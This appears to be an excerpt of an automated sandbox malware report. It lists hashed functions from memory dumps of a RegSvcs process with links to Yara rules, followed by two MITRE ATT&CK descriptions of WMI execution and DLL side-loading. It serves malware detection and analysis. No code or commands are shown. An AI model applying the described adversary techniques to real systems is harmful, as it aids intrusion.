Opcode ID: 466b0182b3eeb84ef54e67a7c49e07bdf75f8a19712db351bff1d6e7d6d7a37e
Instruction ID: d69cdb6f71afdad2178c6c65c8e7f9e326a0efdac1018fc345f10ded572fb2c1
Opcode Fuzzy Hash: 466b0182b3eeb84ef54e67a7c49e07bdf75f8a19712db351bff1d6e7d6d7a37e
Instruction Fuzzy Hash: 3511E978B002055BDB14EBA5D881ABEFBF7EFC9210F508518E509AB344DF316E0687E5

Function 050D5BC8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f98b3ff7a76a3faf8b75885ed1c56c741b7c2414cb5acbcbfaa1eeba16df3a5
Instruction ID: 447a5e855108c5a7752b1e2d4b2a9d5f54ac60972671fdb0227d2a08448c6f15
Opcode Fuzzy Hash: 3f98b3ff7a76a3faf8b75885ed1c56c741b7c2414cb5acbcbfaa1eeba16df3a5
Instruction Fuzzy Hash: D621D232E047188FDF14CBA8E845AEEBBF1AF8D310F04416AC802B7250DB709845CFA1

Function 050D8670 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 857a4dfc80efed46c468196ff7ef56e663a3c9441f802b680d47fe0514e907a8
Instruction ID: 225b2521df6984b9e151b04a89af1a7917262f1c42921860c2fd49385d41a02d
Opcode Fuzzy Hash: 857a4dfc80efed46c468196ff7ef56e663a3c9441f802b680d47fe0514e907a8
Instruction Fuzzy Hash: 90118F347007109FCB08AB7AE45892DBBE6FF893113504469E11ACB760CF32EC12CB90

Function 00F1D04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1536216143.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f1d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
Instruction ID: 31127fb8a9ada19c5d6e85d10049ddb6cd1fe7da3b83966e3addb29fe1c47ec4
Opcode Fuzzy Hash: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
Instruction Fuzzy Hash: F021CD76904280EFDB06CF10D9C0B56BF72FB88324F2486A9D9481A256C33AD866DB91

Function 050D8660 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3e929890ae7691e12791f719d58d00c78e4c030cd3073576c9c2ebe01c814e
Instruction ID: f733b179b3f8642c5b35bfe3e20963b21ef22855ecda6c16c11ee1c54bd44239
Opcode Fuzzy Hash: ef3e929890ae7691e12791f719d58d00c78e4c030cd3073576c9c2ebe01c814e
Instruction Fuzzy Hash: 641186347006009FDB04AB7AE498A6DBBE6FFC93117954469E11ACB760CF35EC12CB91

Function 00F2D2EF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1536343483.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f2d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
Instruction ID: 4ad5047d3a537c591ebc07ce42eabe68daa299950fa3f11b27ae99570f32114f
Opcode Fuzzy Hash: bf2aa0ac69dbfc9ab00947b0048f034b327edea99ed69b312f674443a93577a4
Instruction Fuzzy Hash: 1411BF76904280CFCB15CF14E5C4B19FB62FB84324F24C6AAD8494B656C33AD80ADBA2

Function 00F2D49F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1536343483.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f2d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: 66ad8b69a998809094f65d48aec3b2cbd5c22fa117db808e29bbb354a3f7009d
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: F511D075904244CFDB05CF14D5C4B15BF61FB84328F28C6ADD8494B292C37AD80ACB52

Function 050DD518 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90310a06f10971b0416bda0eb4100a786e3c8c551c92b69f7d3478603149a2c3
Instruction ID: a9838cdedb53fb3b536563aa1b0ab9c5dc58855ae2a1e0c0fad72958ee2eb9b8
Opcode Fuzzy Hash: 90310a06f10971b0416bda0eb4100a786e3c8c551c92b69f7d3478603149a2c3
Instruction Fuzzy Hash: 0511D672204304DFD715DF25E454B59BBBAFF89795F448469E80A8F690CB36E840CB60

Function 050DA350 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ba2e5954360568313195414f836b57eb85579cfd4f62cd5226f888dd88f296
Instruction ID: 317b7a136cebfe4662df28173e8e011ce0ee84c56da14f79b8f2fcb09d45d602
Opcode Fuzzy Hash: 70ba2e5954360568313195414f836b57eb85579cfd4f62cd5226f888dd88f296
Instruction Fuzzy Hash: BE01BC797002009FD704AB68E885B7E7BEAEB88271F14412AF90ADB380CF358D02C790

Function 050DC830 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60d7e2b6c5a125b19b0368f9d029de5b937532f73245b594062b72d5fc4f06ab
Instruction ID: 8adb268f903d9e5fecca278fbce9418d4a719c093017aedd6ee4228a9d4aa891
Opcode Fuzzy Hash: 60d7e2b6c5a125b19b0368f9d029de5b937532f73245b594062b72d5fc4f06ab
Instruction Fuzzy Hash: 9A01B1757206108BDB119A18E48596EFBAFFFC8721F148116F80A8B395CF359C02C6E1

Function 050DB4E8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db3cc5981025fb9d7e349b282b9b16d2f2eee34f2e9ff1679ca030fe64f7ab19
Instruction ID: cef50088e08a2c60f6e116687a14f18a23042e6a8205637eedb6d8ec09af6831
Opcode Fuzzy Hash: db3cc5981025fb9d7e349b282b9b16d2f2eee34f2e9ff1679ca030fe64f7ab19
Instruction Fuzzy Hash: D601BCB1A293058FDB08EF74D4246AEBBF5EF85340B1584A9D806C7394EF30C901CB11

Function 050DA360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2648176b6d687f2eacc928e5fab3fc0c33814c8b926de6051df11bb819039fd6
Instruction ID: e55f8f70f290660e0271ac2ec8844e7ec8df6e35ed108609aa362487f2af1500
Opcode Fuzzy Hash: 2648176b6d687f2eacc928e5fab3fc0c33814c8b926de6051df11bb819039fd6
Instruction Fuzzy Hash: E2014B757002146F9754AB59A885E7E7BEEEBC86A0B148019F909DB340DF719D0187A4

Function 050DDD7A Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a49975d9a160c45c6a0f338768633529e9219bc6985da638699e6d6bb7606ee
Instruction ID: 6d7af3a230c7b018607b278de0a985743f2c1aad6920a6ae4bc4d6e05b7ffcb2
Opcode Fuzzy Hash: 3a49975d9a160c45c6a0f338768633529e9219bc6985da638699e6d6bb7606ee
Instruction Fuzzy Hash: C301D1727067405BD7159F3AE890A2BBBEAEFC9720B14487CE50A87315CE36DC42C760

Function 050D4871 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a73a0f8d35a38d6b9e08340b210c1ac668aa92f07152c9f1e3fd1a4d8d2fdb
Instruction ID: ee63ed4af446eaeed1a338c56c7b3ef25ce653d7ed71f03342198233da214fea
Opcode Fuzzy Hash: 35a73a0f8d35a38d6b9e08340b210c1ac668aa92f07152c9f1e3fd1a4d8d2fdb
Instruction Fuzzy Hash: 7A018F366003049BDB24DB65F85AB7E7FA6EFC6720F08452CF1168B280DF79A8029761

Function 050DD507 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 276ec14334b743370ff4cdf55b8bc9a30476fd3cd357008f1ed1b027361e1e7f
Instruction ID: 86078364e89fff36bc5253baff98b8e896f28993998878761545bbe75d413831
Opcode Fuzzy Hash: 276ec14334b743370ff4cdf55b8bc9a30476fd3cd357008f1ed1b027361e1e7f
Instruction Fuzzy Hash: 55014F72614305DFD714DF66F455B69FBAAFB88752F048029F5058E250DF32E401CB60

Function 050DB4D7 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c317efa121ff2189f54de28079dc19c98c0f87d3d337700c38d5565f8fb2a5c
Instruction ID: 9f45c4aaca1d3d2c96bfc25a23a9fab00d6515defbdd331009b22a7974ed7152
Opcode Fuzzy Hash: 6c317efa121ff2189f54de28079dc19c98c0f87d3d337700c38d5565f8fb2a5c
Instruction Fuzzy Hash: 2EF0AFB6A25300CFD708DB30D4557A97BF1FF52200F5A49E9D486C7295EA258905CB11

Function 050DD49F Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c5e25e10afedf65fd39b22870ed78630b3d480e17374996d4912702c4489a6c
Instruction ID: edac3daa0c70d163b20fb63abdca5dd13197ae7166c18711f46ddc18f6cdcd5a
Opcode Fuzzy Hash: 1c5e25e10afedf65fd39b22870ed78630b3d480e17374996d4912702c4489a6c
Instruction Fuzzy Hash: 360169B2E10118ABCB04DF99E845BEEBBBAFBCC311F04816AE215D7240DB7155028B90

Function 050D4880 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3acc7a53c1ac4e1173ebc41700654c72f4b7fab14eca63feee60829d6719464e
Instruction ID: 098b782de561f13a23d1c2f890d58d92d0fa27ee106dbd90043b62d137b47c93
Opcode Fuzzy Hash: 3acc7a53c1ac4e1173ebc41700654c72f4b7fab14eca63feee60829d6719464e
Instruction Fuzzy Hash: 9DF0F4367003049BDB20DB25E449A7EBFA6EFC1720B04412CF0068B280DF759C029760

Function 050D9D9F Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf1f4039d5ccb5a80546db8dd0fa9acea43d2eabdb9ce4e50b44a2957b99af7
Instruction ID: 7581ae33da22b312795a59029bcfb8b37cb7bbe6b78e27062b676db66f35a0a1
Opcode Fuzzy Hash: 0bf1f4039d5ccb5a80546db8dd0fa9acea43d2eabdb9ce4e50b44a2957b99af7
Instruction Fuzzy Hash: D8F0A475208A51AFD310CF26E498866FFB6FF8E2113108A5DE45A83740CB34F956CBE1

Function 050D4900 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61092513e00f3f274235136785a183f70eec14250411fc13291ebd4121f2d0a3
Instruction ID: 144cc7a8c6b74cdca2936fb8e29e5b1830caae53610d7cf9916f6ba9cbc17303
Opcode Fuzzy Hash: 61092513e00f3f274235136785a183f70eec14250411fc13291ebd4121f2d0a3
Instruction Fuzzy Hash: 19F0BB31B443105BEB68E765F8197BEB696E7C1711F06006AA50A9B2C8CEF45C4187A6

Function 050DD290 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 417fac2a5456b57fc4da70af1f01789f5e1219ceca8cdb82450f480e5b8f3ea3
Instruction ID: 9eaa123a097fedcff91afcbd8f68e28d5d90163154638fe7315fd7dfb77e1ed6
Opcode Fuzzy Hash: 417fac2a5456b57fc4da70af1f01789f5e1219ceca8cdb82450f480e5b8f3ea3
Instruction Fuzzy Hash: 81F01272311114ABC7149A5EE88899FFFAEFBD9371B508126F509CB350CB319C42C7A0

Function 050DD4B0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf22a2b086b5c7e9bb40d9d3485a11d814f8d6f4658c304c444ec4fde4240d2
Instruction ID: 5a5fde860ff5d9ebb1d00fb2ee57bc7b59c75c5adff838e7dc820218b49470f2
Opcode Fuzzy Hash: 3cf22a2b086b5c7e9bb40d9d3485a11d814f8d6f4658c304c444ec4fde4240d2
Instruction Fuzzy Hash: 27F012B2E10119ABCB05DB999C15AEEBBFAEFCC711F048126F615D7240DB7155118B90

Function 050DD082 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3051d8cdfa49d4050e1a40d9751877ed8f0dcaecb7ead549c77fceeb8d348b
Instruction ID: 6597c4556cd9bec8b9228d0e4962929908f25b46b0b75a96f0a867279bd5f186
Opcode Fuzzy Hash: da3051d8cdfa49d4050e1a40d9751877ed8f0dcaecb7ead549c77fceeb8d348b
Instruction Fuzzy Hash: D5F0A0B26182159FDB14CA99E885BAFBBEEFBC8325F444429F10DD3240DB22A8014790

Function 050DEF08 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17836f2beee9e7e475940839e2687cdb076d10657dff30a38ab26a6999da365a
Instruction ID: d6d505280419215b481719a1a2aeaf897bd20a0e6bf0a3dd15f4e841dd4086ac
Opcode Fuzzy Hash: 17836f2beee9e7e475940839e2687cdb076d10657dff30a38ab26a6999da365a
Instruction Fuzzy Hash: 16E0E576B242025BC7104549E845B9FFBAEE7D5620F1C8166E408CB384DA31D801CB90

Function 050D6BA0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a0706f045007c460b40e5a793804c46a6aafabaf3ab8bb66a71227641203f78
Instruction ID: 1e5bf9a41632d8787841d28ecb1bc2388ad5ea34bbb49c4db079002636a9c7d7
Opcode Fuzzy Hash: 8a0706f045007c460b40e5a793804c46a6aafabaf3ab8bb66a71227641203f78
Instruction Fuzzy Hash: FAF0E2366483144FDBA85B65E80DBAD7FE8EF04331F000029F007C7661CAB2E882CB90

Function 050D6D30 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24c607d0ebce2162fbaf3f36107f71dec53f321cf71809bb3901ab20861d4ca8
Instruction ID: 5f307ef9dd6970a81cf6a3aff5a84f57abd6e74c4a19f253cde072900fcf3526
Opcode Fuzzy Hash: 24c607d0ebce2162fbaf3f36107f71dec53f321cf71809bb3901ab20861d4ca8
Instruction Fuzzy Hash: ADE068328087684BCB6952A8F50A3FEFFB0EF02210F08806DD08682682D666A802C7C1

Function 050D8B20 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e039838ec80ad3b56badb42008ce9fe34bf375f7fca48e5b79f9548554716e2f
Instruction ID: 69bf5946774d67dff9c9a4d8dcf62436c631ccdcca6d5ff902f131f88c538fb8
Opcode Fuzzy Hash: e039838ec80ad3b56badb42008ce9fe34bf375f7fca48e5b79f9548554716e2f
Instruction Fuzzy Hash: B7E0C23260031897D314E7A9E840B9A77A5FF45358F914CA5E90487286EB76D872C7C1

Function 050DB538 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c915895a6a95a32acf7846922ffbc44ac530c6317ff60630385bf8456bd6567
Instruction ID: 5e8f2f50dc406c280c6c6060cb30b7f4ab6b501082f5a9c75d7c65a4baeaea66
Opcode Fuzzy Hash: 0c915895a6a95a32acf7846922ffbc44ac530c6317ff60630385bf8456bd6567
Instruction Fuzzy Hash: E7E017B22245018BD708EE30C891BDBBBE4FF11340F1A8AA8D086C7294EB20DA05CB51

Function 050D8FC0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e07f06653da5519a359150d9328e0c7d566245de27b4a0700b9e12d8660557c3
Instruction ID: 6ccd4e4b531be7f2ec3ea06807d8de729e71b3225aebe8738748005b24556629
Opcode Fuzzy Hash: e07f06653da5519a359150d9328e0c7d566245de27b4a0700b9e12d8660557c3
Instruction Fuzzy Hash: 40D0121374433416264071FE38025FFF2CE5D900767068072E90CC2545FD19C95023E4

Function 050D543A Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9efcb8bff29ebd67996ff8d41e433ce894a6c8919b5616599223e9ffa3e3a9a
Instruction ID: faff29897c1208b118c6fdd546518db71b1e08a77c6fe4020d03461fc11ea99d
Opcode Fuzzy Hash: a9efcb8bff29ebd67996ff8d41e433ce894a6c8919b5616599223e9ffa3e3a9a
Instruction Fuzzy Hash: D5E082307901108FC7008B69E484EA677E8EB4CB21F014496EA06C7320CAA2AC218B80

Function 050D9810 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5ae06e4d32ee24a45cc1c8b2b9f44fd9bd5a709b5e22a551155c1d362f64be
Instruction ID: 9cf5a7ab10739b806c745fe844411f2e4711624f8edd004383a513245805335c
Opcode Fuzzy Hash: 3a5ae06e4d32ee24a45cc1c8b2b9f44fd9bd5a709b5e22a551155c1d362f64be
Instruction Fuzzy Hash: FBD0A732B082500FD705936DB8914AD7BE6DBCA23934600AAE141C334BCA24DD07CB85

Function 050D5448 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 310c1650b96b1a3892b9af2e3b6471555eb70b5992d1d6961f420ca70b36d1bf
Instruction ID: d9d4b8ec8840b504e2769980fcb626ca4d3883625345fbc3aba482c280588903
Opcode Fuzzy Hash: 310c1650b96b1a3892b9af2e3b6471555eb70b5992d1d6961f420ca70b36d1bf
Instruction Fuzzy Hash: 1AD0A7343401108FC6009718D404DA677E9EF4D721B014096F905C7360CAB2EC008BC0

Function 050D4A90 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1cce6090db1cbaffe3f00266157d65b50b6dc2d5697adf95be5765ab52ff853
Instruction ID: b3ec1cdbbad3e3140d28cb0c8b31c23a49ab89d96521d7a11d3c8487fd90268f
Opcode Fuzzy Hash: a1cce6090db1cbaffe3f00266157d65b50b6dc2d5697adf95be5765ab52ff853
Instruction Fuzzy Hash: 1CD0A734B103148BEF90D724F5C072EBBF1F785704F4445A8C40286190CB7CEC039624

Function 050D8FB0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea2b5420f675763671bdc5d07e7f7bca1c0805b59e8e0a71d674135ed319f61f
Instruction ID: faf94ef8214a622a4ec69336519128c6ac5f9b15d285df36203451c81ef373f9
Opcode Fuzzy Hash: ea2b5420f675763671bdc5d07e7f7bca1c0805b59e8e0a71d674135ed319f61f
Instruction Fuzzy Hash: 63D0122950D3C40EF781ABB83D915AE7FD55D0115A70A88B7C64CC2017E1184410DB10

Function 050DFF70 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1541443160.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_50d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 241668820c420243246cd67e571d88593e8f41af189a050a79aee3d177fa1f48
Instruction ID: bd6c0214d8ab003f48f4bd77ece50a3de248ace96b5b1b2a0a685a49e41b12b6
Opcode Fuzzy Hash: 241668820c420243246cd67e571d88593e8f41af189a050a79aee3d177fa1f48
Instruction Fuzzy Hash: E8C04C7502D3C04FD78297B059295C13F309A2351930A5097D0D1850A3D5044755C767

Non-executed Functions

Function 06110D50 Relevance: 10.3, Strings: 8, Instructions: 301COMMON

Download Yara Rule

Strings

$q, xrefs: 06110F50
$q, xrefs: 06110F76
$q, xrefs: 06110DCC
$q, xrefs: 06110E1C
$q, xrefs: 06110F82
$q, xrefs: 06110E4E
$q, xrefs: 06110E42
$q, xrefs: 06110F00

Memory Dump Source

Source File: 0000000B.00000002.1543016939.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6110000_RegSvcs.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-3886557441
Opcode ID: d4d27d572cb65bf0b1860bbc29e85b8af01002a64cd10f587f57f3fc0092db16
Instruction ID: ed6aac8b3637361c5f23ec0f3b0b1db5a6b794dedc4e7ec915c8e65b08ee8b22
Opcode Fuzzy Hash: d4d27d572cb65bf0b1860bbc29e85b8af01002a64cd10f587f57f3fc0092db16
Instruction Fuzzy Hash: 1DB1CF30F002459FDB589B66C844ABEBBF6FF88201B15846AE516CB3A1DF35DD81CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
